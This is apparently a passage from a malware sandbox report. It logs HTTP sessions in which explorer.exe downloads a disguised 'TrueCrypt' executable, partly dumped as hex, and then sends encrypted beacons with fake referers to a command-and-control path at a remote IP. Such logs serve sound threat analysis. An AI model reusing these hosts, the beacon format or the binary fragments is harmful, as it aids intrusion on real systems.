Nov 18, 2023 10:02:33.813038111 CET	1563	IN	Data Raw: 08 48 8b 54 24 10 4c 8b 44 24 20 48 8b 44 24 28 49 89 fa 4c 8d 5c 24 38 e9 df fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 7c 24 08 48 8b 54 24 10 4c 8b 44 24 18 48 8b 44 24 20 49 89 Data Ascii: HT$LD$ HD$(IL\$8H\|$HT$LD$HD$ IL\$(fHnf`f`fpH\|THH HDoftfu%HH9rHoftfuIH)HI8HtHFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	194.49.94.120	80	192.168.2.4	49744	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:33.215631008 CET	1529	OUT	GET /TrueCrypt_KlHkcF.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.120
Nov 18, 2023 10:02:33.514277935 CET	1531	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:33 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 17 Nov 2023 12:07:50 GMT ETag: "103e000-60a57fc402bac" Accept-Ranges: bytes Content-Length: 17031168 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 68 6c 00 00 dc 03 01 00 d2 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 30 0b 01 00 04 00 00 61 9e 04 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 d0 08 01 4e 00 00 00 00 e0 08 01 64 13 00 00 00 20 09 01 d8 16 00 00 00 d0 01 01 80 0d 00 00 00 00 00 00 00 00 00 00 00 40 09 01 20 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b9 01 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 e4 08 01 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 67 6c 00 00 10 00 00 00 68 6c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 70 b9 06 00 00 80 6c 00 00 ba 06 00 00 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 87 8e 00 00 40 73 00 00 88 8e 00 00 26 73 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 80 0d 00 00 00 d0 01 01 00 0e 00 00 00 ae 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 90 0b 00 00 00 e0 01 01 00 0c 00 00 00 bc 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 e0 d0 06 00 00 f0 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 d0 08 01 00 02 00 00 00 c8 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 64 13 00 00 00 e0 08 01 00 14 00 00 00 ca 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 00 09 01 00 02 00 00 00 de 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 09 01 00 02 00 00 00 e0 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 d8 16 00 00 00 20 09 01 00 18 00 00 00 e2 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 20 e4 01 00 00 40 09 01 00 e6 01 00 00 fa 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hl@0a` Nd @ `(d(.textglhl```.dataplll@`.rdatap@s&s@`@.pdata@0@.xdata@0@.bss`.edataN@0@.idatad@0.CRTp@@.tls@@.rsrc @0.reloc @@0B
Nov 18, 2023 10:02:33.514421940 CET	1532	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 05 b0 01 01 31 c9 c7 00 01 Data Ascii: ff.@H(H1HHHHof8MZuHcP<H8PEtiHtF_l'flH0flH7kH8tS1H(@
Nov 18, 2023 10:02:33.514436007 CET	1533	IN	Data Raw: ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 15 ab 01 01 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 c7 5a 6c 00 48 85 c0 0f 94 c0 0f b6 c0 f7 d8 48 83 c4 28 c3 90 90 90 90 90 90 90 48 8d 0d 09 00 00 Data Ascii: H(H(HH(H(ZlHH(H@I;fv8HHl$Hl$HD$ H\$(fHD$ H\$(,Hl$HHD$H\$sHD$H\$Ld$M;f*HH$H$H
Nov 18, 2023 10:02:33.514447927 CET	1535	IN	Data Raw: 24 1f 44 88 4c 3e 19 48 8b 74 24 78 4c 8b 44 24 50 e9 e0 fb ff ff e8 eb c4 03 00 48 8d 05 76 d8 8a 00 bb 1e 00 00 00 e8 da cd 03 00 48 8b 44 24 60 48 8b 5c 24 48 e8 cb cd 03 00 48 8d 05 ed 81 89 00 bb 02 00 00 00 e8 ba cd 03 00 e8 35 c5 03 00 48 Data Ascii: $DL>Ht$xLD$PHvHD$`H\$HH5Ht$xLD$PA;6ETICH9tH55L&5H9s(IHADH5L5I9rLLHHHHDHHp
Nov 18, 2023 10:02:33.514461040 CET	1536	IN	Data Raw: 02 01 48 8b 0d b7 30 02 01 48 39 d9 73 37 bf 05 00 00 00 48 8d 35 86 81 83 00 e8 a1 fb 04 00 48 89 0d 9a 30 02 01 83 3d 63 ac 07 01 00 75 09 48 89 05 7a 30 02 01 eb 0d 48 8d 3d 71 30 02 01 90 e8 bb f1 06 00 48 89 1d 6c 30 02 01 48 8d 4b fb 48 c1 Data Ascii: H0H9s7H5H0=cuHz0H=q0Hl0HKHHDfDH<HHRHH[ H4Hv0LM@@LMIPLMR`LM[pL$M$L,M=fuHBHHNHT!ML&HH.
Nov 18, 2023 10:02:33.514473915 CET	1537	IN	Data Raw: 01 d0 89 44 24 08 89 54 24 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 44 24 08 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 59 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 48 08 Data Ascii: D$T$D$I;fvYH Hl$Hl$HHHH0fH9Ku-HxH9{u#x@8{uxf@8{uHHO1Hl$H HD$H\$rHD$H\$I;fH(Hl$ Hl$ HD$0H\$81HL$HH\$8HD$0H
Nov 18, 2023 10:02:33.514486074 CET	1539	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c1 48 d1 e8 48 ba 55 55 55 55 55 55 55 55 48 21 d0 48 21 ca 48 8d 0c 02 48 89 ca 48 c1 e9 02 48 bb 33 33 33 33 33 33 33 33 48 21 d9 48 21 d3 48 01 d9 48 89 ca 48 c1 e9 04 48 01 d1 Data Ascii: HHHUUUUUUUUH!H!HHHH33333333H!H!HHHHHH!HHHHHHHH HL$@M;fMH@H$8H$8H$HH}
Nov 18, 2023 10:02:33.514498949 CET	1540	IN	Data Raw: e8 09 c1 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb bd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 52 02 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 7c 24 68 31 d2 Data Ascii: HD$H\$I;fRHHHl$@Hl$@HD$PH\|$h1E1MHDiFCML9IAAEEHEEHEEH1E1L^EiD,0G,LI9~H9wH\$XHD$PLD$8HL$`H\|$hDT$T
Nov 18, 2023 10:02:33.514513016 CET	1541	IN	Data Raw: c4 e2 06 00 48 89 f8 48 89 d9 e8 79 e2 06 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 0f 1f 40 00 e8 db bb 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 a2 fd ff ff cc cc 48 89 44 24 08 31 c9 31 d2 eb Data Ascii: HHyHD$H\$HL$H\|$ @HD$H\$HL$H\|$ HD$114LB@8IDHH9HHD$11<LF@8IDHH9H=<tH?H
Nov 18, 2023 10:02:33.514523029 CET	1543	IN	Data Raw: cc cc 80 3d 03 9b 07 01 01 74 05 e9 d2 06 00 00 48 8b 74 24 08 48 8b 5c 24 10 8a 44 24 20 4c 8d 44 24 28 e9 5a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d c3 9a 07 01 01 74 05 e9 f2 06 00 00 48 8b Data Ascii: =tHt$H\$D$ LD$(Z=tHt$H\$D$LD$ HH@=hthH@oooVo_of oo ov0o0ftftftftffffH@
Nov 18, 2023 10:02:33.813038111 CET	1563	IN	Data Raw: 08 48 8b 54 24 10 4c 8b 44 24 20 48 8b 44 24 28 49 89 fa 4c 8d 5c 24 38 e9 df fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 7c 24 08 48 8b 54 24 10 4c 8b 44 24 18 48 8b 44 24 20 49 89 Data Ascii: HT$LD$ HD$(IL\$8H\|$HT$LD$HD$ IL\$(fHnf`f`fpH\|THH HDoftfu%HH9rHoftfuIH)HI8HtHFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	194.49.94.210	80	192.168.2.4	49755	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:44.028172970 CET	30668	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jhdrdchleymbbryf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: 194.49.94.210
Nov 18, 2023 10:02:44.032593966 CET	30669	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a6 d5 f3 c9 39 df 28 fc 8c 6d f2 5b Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(m[Pfm>&xgT+1L=},@VW)Z^hsKCYf)CrOqQ7<[%(pr\| "JVe5Y(6NBS>Z7Rl)$uzy~phy1-"B
Nov 18, 2023 10:02:44.344146013 CET	30670	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:44.350737095 CET	30670	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gljuxpwsagkiabxi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: 194.49.94.210
Nov 18, 2023 10:02:44.350761890 CET	30670	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a7 d5 f3 c9 38 df 28 fc 89 74 ff 6f Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(to;:X7jIi&FdvP>hB3 P%_ACNj\|d+M9s8LtM~2\$(JMYU@{A2A2s3 ".v18G
Nov 18, 2023 10:02:44.662339926 CET	30671	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 47 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 04 e0 40 b6 f7 73 7d 8f c9 40 a7 93 72 bb bf 34 51 ed 14 b0 15 22 df 17 87 f5 7d Data Ascii: H>99$JY@s}@r4Q"}
Nov 18, 2023 10:02:48.458920956 CET	31870	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktbhigaoacrwp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: 194.49.94.210
Nov 18, 2023 10:02:48.458950043 CET	31870	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a7 d5 f3 c9 39 df 28 fc 8f 40 b3 71 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(@q&pP@9J3z~p$6mjuL
Nov 18, 2023 10:02:48.770839930 CET	31888	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:48.781712055 CET	31888	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uieodwfhihnk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: 194.49.94.210
Nov 18, 2023 10:02:48.781760931 CET	31889	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a4 d5 f3 c9 38 df 28 fc 82 6e 9a 32 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(n24um\7$'(;Q*\|
Nov 18, 2023 10:02:49.095758915 CET	31919	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 43 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 8e d7 5e f3 d0 3c 96 b3 2c 57 fc 10 ed 03 30 c8 Data Ascii: H>99$JY\p}^<,W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.4	49755	194.49.94.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:44.028172970 CET	30668	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jhdrdchleymbbryf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: 194.49.94.210
Nov 18, 2023 10:02:44.032593966 CET	30669	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a6 d5 f3 c9 39 df 28 fc 8c 6d f2 5b Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(m[Pfm>&xgT+1L=},@VW)Z^hsKCYf)CrOqQ7<[%(pr\| "JVe5Y(6NBS>Z7Rl)$uzy~phy1-"B
Nov 18, 2023 10:02:44.344146013 CET	30670	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:44.350737095 CET	30670	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gljuxpwsagkiabxi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: 194.49.94.210
Nov 18, 2023 10:02:44.350761890 CET	30670	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a7 d5 f3 c9 38 df 28 fc 89 74 ff 6f Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(to;:X7jIi&FdvP>hB3 P%_ACNj\|d+M9s8LtM~2\$(JMYU@{A2A2s3 ".v18G
Nov 18, 2023 10:02:44.662339926 CET	30671	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 47 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 04 e0 40 b6 f7 73 7d 8f c9 40 a7 93 72 bb bf 34 51 ed 14 b0 15 22 df 17 87 f5 7d Data Ascii: H>99$JY@s}@r4Q"}
Nov 18, 2023 10:02:48.458920956 CET	31870	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktbhigaoacrwp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: 194.49.94.210
Nov 18, 2023 10:02:48.458950043 CET	31870	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a7 d5 f3 c9 39 df 28 fc 8f 40 b3 71 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(@q&pP@9J3z~p$6mjuL
Nov 18, 2023 10:02:48.770839930 CET	31888	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 